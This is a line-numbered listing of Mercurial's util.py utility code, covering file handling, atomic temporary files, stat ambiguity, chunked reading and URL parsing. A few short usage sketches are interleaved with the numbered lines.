1842 1845 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1843 1846 dir = os.path.normpath(root)
1844 1847 result = []
1845 1848 for part, sep in pattern.findall(name):
1846 1849 if sep:
1847 1850 result.append(sep)
1848 1851 continue
1849 1852
1850 1853 if dir not in _fspathcache:
1851 1854 _fspathcache[dir] = _makefspathcacheentry(dir)
1852 1855 contents = _fspathcache[dir]
1853 1856
1854 1857 found = contents.get(part)
1855 1858 if not found:
1856 1859 # retry "once per directory" per "dirstate.walk" which
1857 1860 # may take place for each patch of "hg qpush", for example
1858 1861 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1859 1862 found = contents.get(part)
1860 1863
1861 1864 result.append(found or part)
1862 1865 dir = os.path.join(dir, part)
1863 1866
1864 1867 return ''.join(result)
1865 1868
1866 1869 def checknlink(testfile):
1867 1870 '''check whether hardlink count reporting works properly'''
1868 1871
1869 1872 # testfile may be open, so we need a separate file for checking to
1870 1873 # work around issue2543 (or testfile may get lost on Samba shares)
1871 1874 f1, f2, fp = None, None, None
1872 1875 try:
1873 1876 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1874 1877 suffix='1~', dir=os.path.dirname(testfile))
1875 1878 os.close(fd)
1876 1879 f2 = '%s2~' % f1[:-2]
1877 1880
1878 1881 oslink(f1, f2)
1879 1882 # nlinks() may behave differently for files on Windows shares if
1880 1883 # the file is open.
1881 1884 fp = posixfile(f2)
1882 1885 return nlinks(f2) > 1
1883 1886 except OSError:
1884 1887 return False
1885 1888 finally:
1886 1889 if fp is not None:
1887 1890 fp.close()
1888 1891 for f in (f1, f2):
1889 1892 try:
1890 1893 if f is not None:
1891 1894 os.unlink(f)
1892 1895 except OSError:
1893 1896 pass
1894 1897
1895 1898 def endswithsep(path):
1896 1899 '''Check path ends with os.sep or os.altsep.'''
1897 1900 return (path.endswith(pycompat.ossep)
1898 1901 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1899 1902
1900 1903 def splitpath(path):
1901 1904 '''Split path by os.sep.
1902 1905 Note that this function does not use os.altsep because it is
1903 1906 meant as a simple alternative to "xxx.split(os.sep)".
1904 1907 It is recommended to use os.path.normpath() before using this
1905 1908 function if needed.'''
1906 1909 return path.split(pycompat.ossep)
1907 1910
1908 1911 def mktempcopy(name, emptyok=False, createmode=None):
1909 1912 """Create a temporary file with the same contents from name
1910 1913
1911 1914 The permission bits are copied from the original file.
1912 1915
1913 1916 If the temporary file is going to be truncated immediately, you
1914 1917 can use emptyok=True as an optimization.
1915 1918
1916 1919 Returns the name of the temporary file.
1917 1920 """
1918 1921 d, fn = os.path.split(name)
1919 1922 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1920 1923 os.close(fd)
1921 1924 # Temporary files are created with mode 0600, which is usually not
1922 1925 # what we want. If the original file already exists, just copy
1923 1926 # its mode. Otherwise, manually obey umask.
1924 1927 copymode(name, temp, createmode)
1925 1928 if emptyok:
1926 1929 return temp
1927 1930 try:
1928 1931 try:
1929 1932 ifp = posixfile(name, "rb")
1930 1933 except IOError as inst:
1931 1934 if inst.errno == errno.ENOENT:
1932 1935 return temp
1933 1936 if not getattr(inst, 'filename', None):
1934 1937 inst.filename = name
1935 1938 raise
1936 1939 ofp = posixfile(temp, "wb")
1937 1940 for chunk in filechunkiter(ifp):
1938 1941 ofp.write(chunk)
1939 1942 ifp.close()
1940 1943 ofp.close()
1941 1944 except: # re-raises
1942 1945 try:
1943 1946 os.unlink(temp)
1944 1947 except OSError:
1945 1948 pass
1946 1949 raise
1947 1950 return temp
1948 1951
1949 1952 class filestat(object):
1950 1953 """help to exactly detect change of a file
1951 1954
1952 1955 'stat' attribute is result of 'os.stat()' if specified 'path'
1953 1956 exists. Otherwise, it is None. This saves callers of this class
1954 1957 a preparatory 'exists()' check.
1955 1958 """
1956 1959 def __init__(self, stat):
1957 1960 self.stat = stat
1958 1961
1959 1962 @classmethod
1960 1963 def frompath(cls, path):
1961 1964 try:
1962 1965 stat = os.stat(path)
1963 1966 except OSError as err:
1964 1967 if err.errno != errno.ENOENT:
1965 1968 raise
1966 1969 stat = None
1967 1970 return cls(stat)
1968 1971
1969 1972 @classmethod
1970 1973 def fromfp(cls, fp):
1971 1974 stat = os.fstat(fp.fileno())
1972 1975 return cls(stat)
1973 1976
1974 1977 __hash__ = object.__hash__
1975 1978
1976 1979 def __eq__(self, old):
1977 1980 try:
1978 1981 # if ambiguity between stat of new and old file is
1979 1982 # avoided, comparison of size, ctime and mtime is enough
1980 1983 # to exactly detect change of a file regardless of platform
1981 1984 return (self.stat.st_size == old.stat.st_size and
1982 1985 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
1983 1986 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
1984 1987 except AttributeError:
1985 1988 pass
1986 1989 try:
1987 1990 return self.stat is None and old.stat is None
1988 1991 except AttributeError:
1989 1992 return False
1990 1993
1991 1994 def isambig(self, old):
1992 1995 """Examine whether new (= self) stat is ambiguous against old one
1993 1996
1994 1997 "S[N]" below means stat of a file at N-th change:
1995 1998
1996 1999 - S[n-1].ctime < S[n].ctime: can detect change of a file
1997 2000 - S[n-1].ctime == S[n].ctime
1998 2001 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1999 2002 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2000 2003 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2001 2004 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2002 2005
2003 2006 Case (*2) above means that a file was changed twice or more
2004 2007 within the same second (= S[n-1].ctime), making timestamp
2005 2008 comparison ambiguous.
2006 2009
2007 2010 The basic idea to avoid such ambiguity is to "advance mtime by
2008 2011 1 sec if the timestamp is ambiguous".
2009 2012
2010 2013 But advancing mtime only in case (*2) doesn't work as
2011 2014 expected, because naturally advanced S[n].mtime in case (*1)
2012 2015 might be equal to manually advanced S[n-1 or earlier].mtime.
2013 2016
2014 2017 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2015 2018 treated as ambiguous regardless of mtime, to avoid overlooking
2016 2019 a change hidden by such colliding mtimes.
2017 2020
2018 2021 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2019 2022 S[n].mtime", even if size of a file isn't changed.
2020 2023 """
2021 2024 try:
2022 2025 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2023 2026 except AttributeError:
2024 2027 return False
2025 2028
2026 2029 def avoidambig(self, path, old):
2027 2030 """Change file stat of specified path to avoid ambiguity
2028 2031
2029 2032 'old' should be previous filestat of 'path'.
2030 2033
2031 2034 This skips avoiding ambiguity, if a process doesn't have
2032 2035 appropriate privileges for 'path'. This returns False in this
2033 2036 case.
2034 2037
2035 2038 Otherwise, this returns True, as "ambiguity is avoided".
2036 2039 """
2037 2040 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2038 2041 try:
2039 2042 os.utime(path, (advanced, advanced))
2040 2043 except OSError as inst:
2041 2044 if inst.errno == errno.EPERM:
2042 2045 # utime() on the file created by another user causes EPERM,
2043 2046 # if a process doesn't have appropriate privileges
2044 2047 return False
2045 2048 raise
2046 2049 return True
2047 2050
2048 2051 def __ne__(self, other):
2049 2052 return not self == other
2050 2053
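# filestat ambiguity sketch: two writes landing within the same ctime
# second compare equal on (size, ctime, mtime), so isambig() flags them
# and avoidambig() nudges mtime one second forward. 'path' is assumed to
# name a real file the current process may utime().
def _demofilestatavoidambig(path):
    old = filestat.frompath(path)
    writefile(path, readfile(path))  # rewrite within the same second
    new = filestat.frompath(path)
    if new.isambig(old):
        new.avoidambig(path, old)    # mtime = (old mtime + 1) & 0x7fffffff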
2051 2054 class atomictempfile(object):
2052 2055 '''writable file object that atomically updates a file
2053 2056
2054 2057 All writes will go to a temporary copy of the original file. Call
2055 2058 close() when you are done writing, and atomictempfile will rename
2056 2059 the temporary copy to the original name, making the changes
2057 2060 visible. If the object is destroyed without being closed, all your
2058 2061 writes are discarded.
2059 2062
2060 2063 checkambig argument of constructor is used with filestat, and is
2061 2064 useful only if target file is guarded by any lock (e.g. repo.lock
2062 2065 or repo.wlock).
2063 2066 '''
2064 2067 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2065 2068 self.__name = name # permanent name
2066 2069 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2067 2070 createmode=createmode)
2068 2071 self._fp = posixfile(self._tempname, mode)
2069 2072 self._checkambig = checkambig
2070 2073
2071 2074 # delegated methods
2072 2075 self.read = self._fp.read
2073 2076 self.write = self._fp.write
2074 2077 self.seek = self._fp.seek
2075 2078 self.tell = self._fp.tell
2076 2079 self.fileno = self._fp.fileno
2077 2080
2078 2081 def close(self):
2079 2082 if not self._fp.closed:
2080 2083 self._fp.close()
2081 2084 filename = localpath(self.__name)
2082 2085 oldstat = self._checkambig and filestat.frompath(filename)
2083 2086 if oldstat and oldstat.stat:
2084 2087 rename(self._tempname, filename)
2085 2088 newstat = filestat.frompath(filename)
2086 2089 if newstat.isambig(oldstat):
2087 2090 # stat of changed file is ambiguous to original one
2088 2091 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2089 2092 os.utime(filename, (advanced, advanced))
2090 2093 else:
2091 2094 rename(self._tempname, filename)
2092 2095
2093 2096 def discard(self):
2094 2097 if not self._fp.closed:
2095 2098 try:
2096 2099 os.unlink(self._tempname)
2097 2100 except OSError:
2098 2101 pass
2099 2102 self._fp.close()
2100 2103
2101 2104 def __del__(self):
2102 2105 if safehasattr(self, '_fp'): # constructor actually did something
2103 2106 self.discard()
2104 2107
2105 2108 def __enter__(self):
2106 2109 return self
2107 2110
2108 2111 def __exit__(self, exctype, excvalue, traceback):
2109 2112 if exctype is not None:
2110 2113 self.discard()
2111 2114 else:
2112 2115 self.close()
2113 2116
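# atomictempfile usage sketch: writes land in a temporary sibling file
# and only replace the target via rename when the block exits cleanly;
# an exception inside the block triggers discard() instead.
def _demoatomictempfile(path):
    with atomictempfile(path, 'wb') as fp:
        fp.write('all-or-nothing')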
2114 2117 def unlinkpath(f, ignoremissing=False, rmdir=True):
2115 2118 """unlink and remove the directory if it is empty"""
2116 2119 if ignoremissing:
2117 2120 tryunlink(f)
2118 2121 else:
2119 2122 unlink(f)
2120 2123 if rmdir:
2121 2124 # try removing directories that might now be empty
2122 2125 try:
2123 2126 removedirs(os.path.dirname(f))
2124 2127 except OSError:
2125 2128 pass
2126 2129
2127 2130 def tryunlink(f):
2128 2131 """Attempt to remove a file, ignoring ENOENT errors."""
2129 2132 try:
2130 2133 unlink(f)
2131 2134 except OSError as e:
2132 2135 if e.errno != errno.ENOENT:
2133 2136 raise
2134 2137
2135 2138 def makedirs(name, mode=None, notindexed=False):
2136 2139 """recursive directory creation with parent mode inheritance
2137 2140
2138 2141 Newly created directories are marked as "not to be indexed by
2139 2142 the content indexing service", if ``notindexed`` is specified
2140 2143 for "write" mode access.
2141 2144 """
2142 2145 try:
2143 2146 makedir(name, notindexed)
2144 2147 except OSError as err:
2145 2148 if err.errno == errno.EEXIST:
2146 2149 return
2147 2150 if err.errno != errno.ENOENT or not name:
2148 2151 raise
2149 2152 parent = os.path.dirname(os.path.abspath(name))
2150 2153 if parent == name:
2151 2154 raise
2152 2155 makedirs(parent, mode, notindexed)
2153 2156 try:
2154 2157 makedir(name, notindexed)
2155 2158 except OSError as err:
2156 2159 # Catch EEXIST to handle races
2157 2160 if err.errno == errno.EEXIST:
2158 2161 return
2159 2162 raise
2160 2163 if mode is not None:
2161 2164 os.chmod(name, mode)
2162 2165
2163 2166 def readfile(path):
2164 2167 with open(path, 'rb') as fp:
2165 2168 return fp.read()
2166 2169
2167 2170 def writefile(path, text):
2168 2171 with open(path, 'wb') as fp:
2169 2172 fp.write(text)
2170 2173
2171 2174 def appendfile(path, text):
2172 2175 with open(path, 'ab') as fp:
2173 2176 fp.write(text)
2174 2177
2175 2178 class chunkbuffer(object):
2176 2179 """Allow arbitrary sized chunks of data to be efficiently read from an
2177 2180 iterator over chunks of arbitrary size."""
2178 2181
2179 2182 def __init__(self, in_iter):
2180 2183 """in_iter is the iterator that's iterating over the input chunks."""
2181 2184 def splitbig(chunks):
2182 2185 for chunk in chunks:
2183 2186 if len(chunk) > 2**20:
2184 2187 pos = 0
2185 2188 while pos < len(chunk):
2186 2189 end = pos + 2 ** 18
2187 2190 yield chunk[pos:end]
2188 2191 pos = end
2189 2192 else:
2190 2193 yield chunk
2191 2194 self.iter = splitbig(in_iter)
2192 2195 self._queue = collections.deque()
2193 2196 self._chunkoffset = 0
2194 2197
2195 2198 def read(self, l=None):
2196 2199 """Read L bytes of data from the iterator of chunks of data.
2197 2200 Returns less than L bytes if the iterator runs dry.
2198 2201
2199 2202 If size parameter is omitted, read everything"""
2200 2203 if l is None:
2201 2204 return ''.join(self.iter)
2202 2205
2203 2206 left = l
2204 2207 buf = []
2205 2208 queue = self._queue
2206 2209 while left > 0:
2207 2210 # refill the queue
2208 2211 if not queue:
2209 2212 target = 2**18
2210 2213 for chunk in self.iter:
2211 2214 queue.append(chunk)
2212 2215 target -= len(chunk)
2213 2216 if target <= 0:
2214 2217 break
2215 2218 if not queue:
2216 2219 break
2217 2220
2218 2221 # The easy way to do this would be to queue.popleft(), modify the
2219 2222 # chunk (if necessary), then queue.appendleft(). However, for cases
2220 2223 # where we read partial chunk content, this incurs 2 dequeue
2221 2224 # mutations and creates a new str for the remaining chunk in the
2222 2225 # queue. Our code below avoids this overhead.
2223 2226
2224 2227 chunk = queue[0]
2225 2228 chunkl = len(chunk)
2226 2229 offset = self._chunkoffset
2227 2230
2228 2231 # Use full chunk.
2229 2232 if offset == 0 and left >= chunkl:
2230 2233 left -= chunkl
2231 2234 queue.popleft()
2232 2235 buf.append(chunk)
2233 2236 # self._chunkoffset remains at 0.
2234 2237 continue
2235 2238
2236 2239 chunkremaining = chunkl - offset
2237 2240
2238 2241 # Use all of unconsumed part of chunk.
2239 2242 if left >= chunkremaining:
2240 2243 left -= chunkremaining
2241 2244 queue.popleft()
2242 2245 # offset == 0 is enabled by block above, so this won't merely
2243 2246 # copy via ``chunk[0:]``.
2244 2247 buf.append(chunk[offset:])
2245 2248 self._chunkoffset = 0
2246 2249
2247 2250 # Partial chunk needed.
2248 2251 else:
2249 2252 buf.append(chunk[offset:offset + left])
2250 2253 self._chunkoffset += left
2251 2254 left -= chunkremaining
2252 2255
2253 2256 return ''.join(buf)
2254 2257
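# chunkbuffer usage sketch: arbitrary-sized input chunks are re-sliced
# into exact-size reads without copying more than necessary.
def _demochunkbuffer():
    cb = chunkbuffer(iter(['ab', 'cdef', 'g']))
    return cb.read(3), cb.read(3), cb.read(3)  # ('abc', 'def', 'g')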
2255 2258 def filechunkiter(f, size=131072, limit=None):
2256 2259 """Create a generator that produces the data in the file size
2257 2260 (default 131072) bytes at a time, up to optional limit (default is
2258 2261 to read all data). Chunks may be less than size bytes if the
2259 2262 chunk is the last chunk in the file, or the file is a socket or
2260 2263 some other type of file that sometimes reads less data than is
2261 2264 requested."""
2262 2265 assert size >= 0
2263 2266 assert limit is None or limit >= 0
2264 2267 while True:
2265 2268 if limit is None:
2266 2269 nbytes = size
2267 2270 else:
2268 2271 nbytes = min(limit, size)
2269 2272 s = nbytes and f.read(nbytes)
2270 2273 if not s:
2271 2274 break
2272 2275 if limit:
2273 2276 limit -= len(s)
2274 2277 yield s
2275 2278
2276 2279 class cappedreader(object):
2277 2280 """A file object proxy that allows reading up to N bytes.
2278 2281
2279 2282 Given a source file object, instances of this type allow reading up to
2280 2283 N bytes from that source file object. Attempts to read past the allowed
2281 2284 limit are treated as EOF.
2282 2285
2283 2286 It is assumed that I/O is not performed on the original file object
2284 2287 in addition to I/O that is performed by this instance. If there is,
2285 2288 state tracking will get out of sync and unexpected results will ensue.
2286 2289 """
2287 2290 def __init__(self, fh, limit):
2288 2291 """Allow reading up to <limit> bytes from <fh>."""
2289 2292 self._fh = fh
2290 2293 self._left = limit
2291 2294
2292 2295 def read(self, n=-1):
2293 2296 if not self._left:
2294 2297 return b''
2295 2298
2296 2299 if n < 0:
2297 2300 n = self._left
2298 2301
2299 2302 data = self._fh.read(min(n, self._left))
2300 2303 self._left -= len(data)
2301 2304 assert self._left >= 0
2302 2305
2303 2306 return data
2304 2307
2305 2308 def readinto(self, b):
2306 2309 res = self.read(len(b))
2307 2310 if res is None:
2308 2311 return None
2309 2312
2310 2313 b[0:len(res)] = res
2311 2314 return len(res)
2312 2315
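# cappedreader usage sketch: reads are clamped to the remaining budget,
# and anything past the limit reads as EOF.
def _democappedreader():
    import io
    fh = cappedreader(io.BytesIO(b'0123456789'), 4)
    return fh.read(8), fh.read()  # (b'0123', b'')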
2313 2316 def unitcountfn(*unittable):
2314 2317 '''return a function that renders a readable count of some quantity'''
2315 2318
2316 2319 def go(count):
2317 2320 for multiplier, divisor, format in unittable:
2318 2321 if abs(count) >= divisor * multiplier:
2319 2322 return format % (count / float(divisor))
2320 2323 return unittable[-1][2] % count
2321 2324
2322 2325 return go
2323 2326
2324 2327 def processlinerange(fromline, toline):
2325 2328 """Check that linerange <fromline>:<toline> makes sense and return a
2326 2329 0-based range.
2327 2330
2328 2331 >>> processlinerange(10, 20)
2329 2332 (9, 20)
2330 2333 >>> processlinerange(2, 1)
2331 2334 Traceback (most recent call last):
2332 2335 ...
2333 2336 ParseError: line range must be positive
2334 2337 >>> processlinerange(0, 5)
2335 2338 Traceback (most recent call last):
2336 2339 ...
2337 2340 ParseError: fromline must be strictly positive
2338 2341 """
2339 2342 if toline - fromline < 0:
2340 2343 raise error.ParseError(_("line range must be positive"))
2341 2344 if fromline < 1:
2342 2345 raise error.ParseError(_("fromline must be strictly positive"))
2343 2346 return fromline - 1, toline
2344 2347
2345 2348 bytecount = unitcountfn(
2346 2349 (100, 1 << 30, _('%.0f GB')),
2347 2350 (10, 1 << 30, _('%.1f GB')),
2348 2351 (1, 1 << 30, _('%.2f GB')),
2349 2352 (100, 1 << 20, _('%.0f MB')),
2350 2353 (10, 1 << 20, _('%.1f MB')),
2351 2354 (1, 1 << 20, _('%.2f MB')),
2352 2355 (100, 1 << 10, _('%.0f KB')),
2353 2356 (10, 1 << 10, _('%.1f KB')),
2354 2357 (1, 1 << 10, _('%.2f KB')),
2355 2358 (1, 1, _('%.0f bytes')),
2356 2359 )
2357 2360
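# bytecount sketch: the first row of the table whose threshold
# (multiplier * divisor) is reached wins, so precision drops as the
# magnitude grows.
def _demobytecount():
    return bytecount(123), bytecount(123456), bytecount(1234567890)
    # ('123 bytes', '121 KB', '1.15 GB'), assuming English translations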
2358 2361 class transformingwriter(object):
2359 2362 """Writable file wrapper to transform data by function"""
2360 2363
2361 2364 def __init__(self, fp, encode):
2362 2365 self._fp = fp
2363 2366 self._encode = encode
2364 2367
2365 2368 def close(self):
2366 2369 self._fp.close()
2367 2370
2368 2371 def flush(self):
2369 2372 self._fp.flush()
2370 2373
2371 2374 def write(self, data):
2372 2375 return self._fp.write(self._encode(data))
2373 2376
2374 2377 # Matches a single EOL which can either be a CRLF where repeated CR
2375 2378 # are removed or a LF. We do not care about old Macintosh files, so a
2376 2379 # stray CR is an error.
2377 2380 _eolre = remod.compile(br'\r*\n')
2378 2381
2379 2382 def tolf(s):
2380 2383 return _eolre.sub('\n', s)
2381 2384
2382 2385 def tocrlf(s):
2383 2386 return _eolre.sub('\r\n', s)
2384 2387
2385 2388 def _crlfwriter(fp):
2386 2389 return transformingwriter(fp, tocrlf)
2387 2390
2388 2391 if pycompat.oslinesep == '\r\n':
2389 2392 tonativeeol = tocrlf
2390 2393 fromnativeeol = tolf
2391 2394 nativeeolwriter = _crlfwriter
2392 2395 else:
2393 2396 tonativeeol = pycompat.identity
2394 2397 fromnativeeol = pycompat.identity
2395 2398 nativeeolwriter = pycompat.identity
2396 2399
2397 2400 if (pyplatform.python_implementation() == 'CPython' and
2398 2401 sys.version_info < (3, 0)):
2399 2402 # There is an issue in CPython that some IO methods do not handle EINTR
2400 2403 # correctly. The following table shows what CPython version (and functions)
2401 2404 # are affected (buggy: has the EINTR bug, okay: otherwise):
2402 2405 #
2403 2406 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2404 2407 # --------------------------------------------------
2405 2408 # fp.__iter__ | buggy | buggy | okay
2406 2409 # fp.read* | buggy | okay [1] | okay
2407 2410 #
2408 2411 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2409 2412 #
2410 2413 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2411 2414 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2412 2415 #
2413 2416 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2414 2417 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2415 2418 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2416 2419 # fp.__iter__ but not other fp.read* methods.
2417 2420 #
2418 2421 # On modern systems like Linux, the "read" syscall cannot be interrupted
2419 2422 # when reading "fast" files like on-disk files. So the EINTR issue only
2420 2423 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2421 2424 # files approximately as "fast" files and use the fast (unsafe) code path,
2422 2425 # to minimize the performance impact.
2423 2426 if sys.version_info >= (2, 7, 4):
2424 2427 # fp.readline deals with EINTR correctly, use it as a workaround.
2425 2428 def _safeiterfile(fp):
2426 2429 return iter(fp.readline, '')
2427 2430 else:
2428 2431 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2429 2432 # note: this may block longer than necessary because of bufsize.
2430 2433 def _safeiterfile(fp, bufsize=4096):
2431 2434 fd = fp.fileno()
2432 2435 line = ''
2433 2436 while True:
2434 2437 try:
2435 2438 buf = os.read(fd, bufsize)
2436 2439 except OSError as ex:
2437 2440 # os.read only raises EINTR before any data is read
2438 2441 if ex.errno == errno.EINTR:
2439 2442 continue
2440 2443 else:
2441 2444 raise
2442 2445 line += buf
2443 2446 if '\n' in buf:
2444 2447 splitted = line.splitlines(True)
2445 2448 line = ''
2446 2449 for l in splitted:
2447 2450 if l[-1] == '\n':
2448 2451 yield l
2449 2452 else:
2450 2453 line = l
2451 2454 if not buf:
2452 2455 break
2453 2456 if line:
2454 2457 yield line
2455 2458
2456 2459 def iterfile(fp):
2457 2460 fastpath = True
2458 2461 if type(fp) is file:
2459 2462 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2460 2463 if fastpath:
2461 2464 return fp
2462 2465 else:
2463 2466 return _safeiterfile(fp)
2464 2467 else:
2465 2468 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2466 2469 def iterfile(fp):
2467 2470 return fp
2468 2471
2469 2472 def iterlines(iterator):
2470 2473 for chunk in iterator:
2471 2474 for line in chunk.splitlines():
2472 2475 yield line
2473 2476
2474 2477 def expandpath(path):
2475 2478 return os.path.expanduser(os.path.expandvars(path))
2476 2479
2477 2480 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2478 2481 """Return the result of interpolating items in the mapping into string s.
2479 2482
2480 2483 prefix is a single character string, or a two character string with
2481 2484 a backslash as the first character if the prefix needs to be escaped in
2482 2485 a regular expression.
2483 2486
2484 2487 fn is an optional function that will be applied to the replacement text
2485 2488 just before replacement.
2486 2489
2487 2490 escape_prefix is an optional flag that allows the prefix to be escaped
2488 2491 by doubling it.
2489 2492 """
2490 2493 fn = fn or (lambda s: s)
2491 2494 patterns = '|'.join(mapping.keys())
2492 2495 if escape_prefix:
2493 2496 patterns += '|' + prefix
2494 2497 if len(prefix) > 1:
2495 2498 prefix_char = prefix[1:]
2496 2499 else:
2497 2500 prefix_char = prefix
2498 2501 mapping[prefix_char] = prefix_char
2499 2502 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2500 2503 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
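# Standalone sketch of the same idea (hypothetical names, plain str instead
# of this module's bytes): mapping keys become one alternation regex and
# every match is replaced through the mapping.
import re

def interpolate_sketch(prefix, mapping, s):
    pattern = re.compile('%s(%s)' % (re.escape(prefix),
                                     '|'.join(map(re.escape, mapping))))
    return pattern.sub(lambda m: mapping[m.group(1)], s)

assert interpolate_sketch('$', {'user': 'joe'}, 'hi $user') == 'hi joe'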
2501 2504
2502 2505 def getport(port):
2503 2506 """Return the port for a given network service.
2504 2507
2505 2508 If port is an integer, it's returned as is. If it's a string, it's
2506 2509 looked up using socket.getservbyname(). If there's no matching
2507 2510 service, error.Abort is raised.
2508 2511 """
2509 2512 try:
2510 2513 return int(port)
2511 2514 except ValueError:
2512 2515 pass
2513 2516
2514 2517 try:
2515 2518 return socket.getservbyname(pycompat.sysstr(port))
2516 2519 except socket.error:
2517 2520 raise error.Abort(_("no port number associated with service '%s'")
2518 2521 % port)
2519 2522
2520 2523 class url(object):
2521 2524 r"""Reliable URL parser.
2522 2525
2523 2526 This parses URLs and provides attributes for the following
2524 2527 components:
2525 2528
2526 2529 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2527 2530
2528 2531 Missing components are set to None. The only exception is
2529 2532 fragment, which is set to '' if present but empty.
2530 2533
2531 2534 If parsefragment is False, fragment is included in query. If
2532 2535 parsequery is False, query is included in path. If both are
2533 2536 False, both fragment and query are included in path.
2534 2537
2535 2538 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2536 2539
2537 2540 Note that for backward compatibility reasons, bundle URLs do not
2538 2541 take host names. That means 'bundle://../' has a path of '../'.
2539 2542
2540 2543 Examples:
2541 2544
2542 2545 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2543 2546 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2544 2547 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2545 2548 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2546 2549 >>> url(b'file:///home/joe/repo')
2547 2550 <url scheme: 'file', path: '/home/joe/repo'>
2548 2551 >>> url(b'file:///c:/temp/foo/')
2549 2552 <url scheme: 'file', path: 'c:/temp/foo/'>
2550 2553 >>> url(b'bundle:foo')
2551 2554 <url scheme: 'bundle', path: 'foo'>
2552 2555 >>> url(b'bundle://../foo')
2553 2556 <url scheme: 'bundle', path: '../foo'>
2554 2557 >>> url(br'c:\foo\bar')
2555 2558 <url path: 'c:\\foo\\bar'>
2556 2559 >>> url(br'\\blah\blah\blah')
2557 2560 <url path: '\\\\blah\\blah\\blah'>
2558 2561 >>> url(br'\\blah\blah\blah#baz')
2559 2562 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2560 2563 >>> url(br'file:///C:\users\me')
2561 2564 <url scheme: 'file', path: 'C:\\users\\me'>
2562 2565
2563 2566 Authentication credentials:
2564 2567
2565 2568 >>> url(b'ssh://joe:xyz@x/repo')
2566 2569 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2567 2570 >>> url(b'ssh://joe@x/repo')
2568 2571 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2569 2572
2570 2573 Query strings and fragments:
2571 2574
2572 2575 >>> url(b'http://host/a?b#c')
2573 2576 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2574 2577 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2575 2578 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2576 2579
2577 2580 Empty path:
2578 2581
2579 2582 >>> url(b'')
2580 2583 <url path: ''>
2581 2584 >>> url(b'#a')
2582 2585 <url path: '', fragment: 'a'>
2583 2586 >>> url(b'http://host/')
2584 2587 <url scheme: 'http', host: 'host', path: ''>
2585 2588 >>> url(b'http://host/#a')
2586 2589 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2587 2590
2588 2591 Only scheme:
2589 2592
2590 2593 >>> url(b'http:')
2591 2594 <url scheme: 'http'>
2592 2595 """
2593 2596
2594 2597 _safechars = "!~*'()+"
2595 2598 _safepchars = "/!~*'()+:\\"
2596 2599 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2597 2600
2598 2601 def __init__(self, path, parsequery=True, parsefragment=True):
2599 2602 # We slowly chomp away at path until we have only the path left
2600 2603 self.scheme = self.user = self.passwd = self.host = None
2601 2604 self.port = self.path = self.query = self.fragment = None
2602 2605 self._localpath = True
2603 2606 self._hostport = ''
2604 2607 self._origpath = path
2605 2608
2606 2609 if parsefragment and '#' in path:
2607 2610 path, self.fragment = path.split('#', 1)
2608 2611
2609 2612 # special case for Windows drive letters and UNC paths
2610 2613 if hasdriveletter(path) or path.startswith('\\\\'):
2611 2614 self.path = path
2612 2615 return
2613 2616
2614 2617 # For compatibility reasons, we can't handle bundle paths as
2615 2618 # normal URLs
2616 2619 if path.startswith('bundle:'):
2617 2620 self.scheme = 'bundle'
2618 2621 path = path[7:]
2619 2622 if path.startswith('//'):
2620 2623 path = path[2:]
2621 2624 self.path = path
2622 2625 return
2623 2626
2624 2627 if self._matchscheme(path):
2625 2628 parts = path.split(':', 1)
2626 2629 if parts[0]:
2627 2630 self.scheme, path = parts
2628 2631 self._localpath = False
2629 2632
2630 2633 if not path:
2631 2634 path = None
2632 2635 if self._localpath:
2633 2636 self.path = ''
2634 2637 return
2635 2638 else:
2636 2639 if self._localpath:
2637 2640 self.path = path
2638 2641 return
2639 2642
2640 2643 if parsequery and '?' in path:
2641 2644 path, self.query = path.split('?', 1)
2642 2645 if not path:
2643 2646 path = None
2644 2647 if not self.query:
2645 2648 self.query = None
2646 2649
2647 2650 # // is required to specify a host/authority
2648 2651 if path and path.startswith('//'):
2649 2652 parts = path[2:].split('/', 1)
